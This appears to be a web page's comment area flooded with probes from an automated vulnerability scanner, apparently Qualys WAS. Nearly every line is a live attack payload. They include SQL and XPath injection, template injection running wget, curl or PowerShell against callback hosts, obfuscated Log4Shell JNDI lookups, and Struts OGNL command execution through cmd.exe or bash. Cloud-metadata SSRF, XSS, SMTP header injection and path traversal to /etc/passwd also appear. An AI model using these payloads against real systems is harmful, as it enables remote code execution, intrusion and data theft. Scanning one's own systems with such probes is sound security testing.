Post comment
John" and false() and "or" = "and
1
John" or true() or "and" = "and
1
John
1 and false() and 'or' = 'and'
John
1 or true() or 'and' = 'and'
John and false() and 'or' = 'and'
1
John or true() or 'and' = 'and'
1
John' or not(false()) or 'true' = 'true
1
John' or true() or 'and' = 'and
1
John
1' and 'tpklq'='xqlkp
John
1' or 'tpklq'='tpklq
John' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
John' or 'tpklq'='tpklq
1
John') and 'swqtp'='ptqws
1
John') or 'swqtp'='swqtp
1
John aND 7248=2491 + 4757
1
John
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
John
1') and 2634=1123 --
John
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://a0e364589f38978bea8dda4d20041840cadc94cc.1523145317359663.1872819839.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://0896b3344642897dcf924fdcd3a6c94fa855c184.1523145317359663.4237911352.oscomm15019101.oscomm.eu1.qualysper
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://0da81f561a46e3d7cafbe901743db6008bcb1b8b.1523145317359663.2021905764.oscomm27.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://1168cd61f1d3f75ee88a3e9c65490dc38d5e1ad6.1523145317359663.159518285.oscomm27.oscomm.eu1.qualysperiscop
1
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://fa73ba824b80b7358419f38ca80490534909d063.1523145317359663.2886684041.oscomm26.oscomm.eu1.qualysperisco
1
John
${url:UTF-8::https://e7b586ee1a98476299e143ac182ecce53c88105b.1523145317359663.3887713567.oscomm25.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8::https://ca2f2f49e375d9faee1e18e23c146f1b70ab5405.1523145317359663.202458433.oscomm25.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::http://b82fecc500db5c97551b120fc873c47dc8d395cd.1523145317359663.2797838500.oscomm24.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8::http://7124f272934b5b86082c688ea26a52bc29ea2f96.1523145317359663.486818309.oscomm24.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:https://2b764f4a0d123378d8055cefbe96229ab2027f76.1523145317359663.2368037417.oscomm23.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:https://4e96f8d8d6e250099300561a94009d442d6f87df.1523145317359663.3668452057.oscomm23.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:http://0d61a8f298f36aa8cae847ebc941613386a5cbc4.1523145317359663.122336536.oscomm22.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:http://e615613d171b78cf55cd5ac6fc85d268f4826448.1523145317359663.3613721860.oscomm22.oscomm.eu1.qualysperiscope.com.}
1
John
${dns:address|67fa2164f3f71c0173503685074e41438ea2d847.1523145317359663.3090613491.oscomm21.oscomm.eu1.qualysperiscope.com.}
${dns:address|f6b1ff3eadaa12de3f3c121fcab48aaa51fa438b.1523145317359663.1981007597.oscomm21.oscomm.eu1.qualysperiscope.com.}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://f0be9cd073f99ad6029af8a31e70d19a9debb9f8.1523145317359663.3764464079.oscomm20.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://86999c96893f105b80d6ae36b984c38fa68c7669.1523145317359663.3013316236.oscomm20.oscomm.eu1.qualysperiscope.com.')}
1
John
${url:UTF-8:https://05847f3e79757d4b8ce4bb6a20449d56cc8eb647.1523145317359663.1777744348.oscomm19.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8:https://8f935ddd9bc8fb64b001a0e063ed9c3806bfe086.1523145317359663.56850651.oscomm19.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8:http://9b2ae72e84714163d7041d3a2eed75d46d6e8a27.1523145317359663.688345274.oscomm18.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8:http://69e1a8123b882547431a5920598d7cea57514778.1523145317359663.1112557246.oscomm18.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::https://dfd82ac023d7b5fc00371335c3af775b84386359.1523145317359663.3384346302.oscomm17.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8::https://2b10a066086726147f0711f974019e4b88cac36f.1523145317359663.2825403047.oscomm17.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::https://c6e1923750cb74e3e2ce57237b7b2cffa82d0f2b.1523145317359663.1617674705.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}
${url:UTF-8::https://011cab7ff7810bfbce1869a701b747fc5c6f93a2.1523145317359663.3826771601.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://e7474bbe79808e20f122815b496de6b197371151.1523145317359663.2007344329.oscomm14.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://502458bdf6bc6e480acf999fee4a30cb7c6088a5.1523145317359663.1630880520.oscomm14.oscomm.eu1.qualysperiscope.com.')}
1
John
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://6263c5b2ef40b7804bb1098671004d03ed44689a.1523145317359663.2286839542.oscomm12.oscomm.eu1.qualysperiscope.com.')}
John
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://a5748278d2a1f4c13b7e85650c68876c1e14f1de.1523145317359663.2441055442.oscomm10.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://fc92900e5acd621abbf8a748d6b5db39c67e5947.1523145317359663.1573529369.oscomm10.oscomm.eu1.qualysperiscop
1
John
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
1
John
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
1
John
${url:UTF-8:https://f3a77e378da0a3128f4b285d555fb563d11da45a.1523145317359663.1995767358.oscomm07.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:https://ddba21f33c7855ffad50a4a12b853f8506ab2c8f.1523145317359663.2656480023.oscomm07.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:http://e4bdf82508c3956975a1720add3885bf5a235c62.1523145317359663.869463722.oscomm06.oscomm.eu1.qualysperiscope.com.}
John
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
1
John
${dns:address|eed8fe372c4a043424b3867c9d38a814ec7c1535.1523145317359663.1457093420.oscomm04.oscomm.eu1.qualysperiscope.com.}
${dns:address|25e5f5da0c3d3bdfc1f745e3c9c8f260d8ec7d3e.1523145317359663.120711641.oscomm04.oscomm.eu1.qualysperiscope.com.}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://ee6de8b98d32ce31c1f19eb21f737c3999562000.1523145317359663.3795509148.oscomm02.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://df7a77aa2584a536430dcac9f45ff636a0ac3f81.1523145317359663.213959754.oscomm02.oscomm.eu1.qualysperiscope.com.')}
1
John
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9c261899e535657983a59c279a2de18ff8e60739.1523145317359663.884101388.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b676f8e0ed1410fba54cea8a027aac2a78588624.1523145317359663.3410237247.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://679fe8f9aae421633b05e5a063af9a37fe4f6dc1.1523145317359663.4065473924.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://09d987bc00c61c4e7a3782b962c074acb7e4c55d.1523145317359663.3280538587.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//1b3125037900ce60454970742cf22e5109c1fd6b.1523145317359663.1271029463.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a6505c5543007d1e7614e5ae773ee8e1a81da167.1523145317359663.1625497673.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:dns://924ea46cf622739ba785740b873d8edb021bea3f.1523145317359663.1155268685.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:dns://2c570678a8732c552d4b8a5c4c675679eeed1a32.1523145317359663.2343291780.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//aad6c66c493d6a3674c44fe31e5605408db6e612.1523145317359663.3170070127.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//44dabd58497edce4dc92b012e8ccb2ca3114497d.1523145317359663.544636816.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jnd${123%ff:-${123%ff:-i:}}ldap://0835cfc7e3d3c7a758d4fe481acaa31bd88ba635.1523145317359663.3493693662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
${jnd${123%ff:-${123%ff:-i:}}ldap://6e5a9ae6f3f442c2ce842ddc704186299793b38d.1523145317359663.2406127967.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${::-n}di:ldap${::-:}//f87ebd990cde3072282e83a60db86a227f8237ad.1523145317359663.1710158108.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${::-n}di:ldap${::-:}//b390d9ccc51886852c7fbd2f396022bd2effa770.1523145317359663.2682141920.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://c969cbaf9598f9c5918aadd7b458c094dfa49b2d.1523145317359663.2809206209.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://e6562c799b451c1572cf3d21a55d9441e80a04bb.1523145317359663.907044701.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://f8a6643c0f4f6224a78fbe91ada3f864ce69e992.1523145317359663.1062401354.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2d14ad9f6948bf5b15029e555bb38073008219d3.1523145317359663.137895838.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:rmi://eb31997ecf8d64f2533ee8c3eda88a968021ff63.1523145317359663.2178349668.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
John
${jndi:ldap://3a11a332570ed3cc3dc1b10abebc7a515629d6d5.1523145317359663.941521998.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:ldap://6b0ba0f50f51c8fbd3f2d897f63dde0eff96cc3b.1523145317359663.884274828.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
ping -c 2 b7c12f313fc1b9e01eb5a9c259bc8b5b6a762e13.1523145317359663.4166643789.oscomm01.oscomm.eu1.qualysperiscope.com.
1
John
http://2ea6710d82fb9e311733f12179f56242b72da341.1523145317359663.2708986990.ssrf01.ssrf.eu1.qualysperiscope.com.
http://8eaa5101b4c8d496023f47849bf0c070b89c4e59.1523145317359663.3956953710.ssrf01.ssrf.eu1.qualysperiscope.com.
1
John
Joe+
bcc:was_engine@f19d3c600321dcce2edde129faa720ba05aaf4ab.1523145317359663.1037769574.smtphi01.smtp.eu1.qualysperiscope.com.
John
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/
1
John
</script><script>function(){qxssczvZVNZY};</script>
</script><script>function(){qxssg1sE51Te};</script>
1
John
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
1
John
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
1
John
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
John
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
John
*/;(function(){qxss63ekgbFk});/*
*/;(function(){qxss4Ua72M14});/*
1
John
9
;(function(){qxssXys877fy});//
9
;(function(){qxssFvz0g8g3});//
1
9;(function(){qxssSpk4cQyA});//
1
John
';(function(){qxssk5SULyXR});/**/'
';(function(){qxssS3NZuwcS});/**/'
1
John
qualys(aqxssWST5B6mr)xyz
qualys(aqxss5GJc9X6i)xyz
1
John
");(function(){qxssqZXgJ7lP});/**/"
");(function(){qxss35NCW081});/**/"
1
John
";(function(){qxss4Nsqo6xG});/**/"
";(function(){qxssbU5ZVb58});/**/"
1
John
javascript:qxss(X154405448Y7_2Z);
javascript:qxss(X154405448Y1_2Z);
1
John
a(){}phpinfo(); function a
a(){}phpinfo(); function a
1
John
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstan
1
John
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#
1
John
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#og
1
John
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
John
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
John
//....//....//....//....//....//....//....//etc/passwd
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
John
../../../../../../../etc/passwd
../../../../../../../etc/passwd
1
John
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
John
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1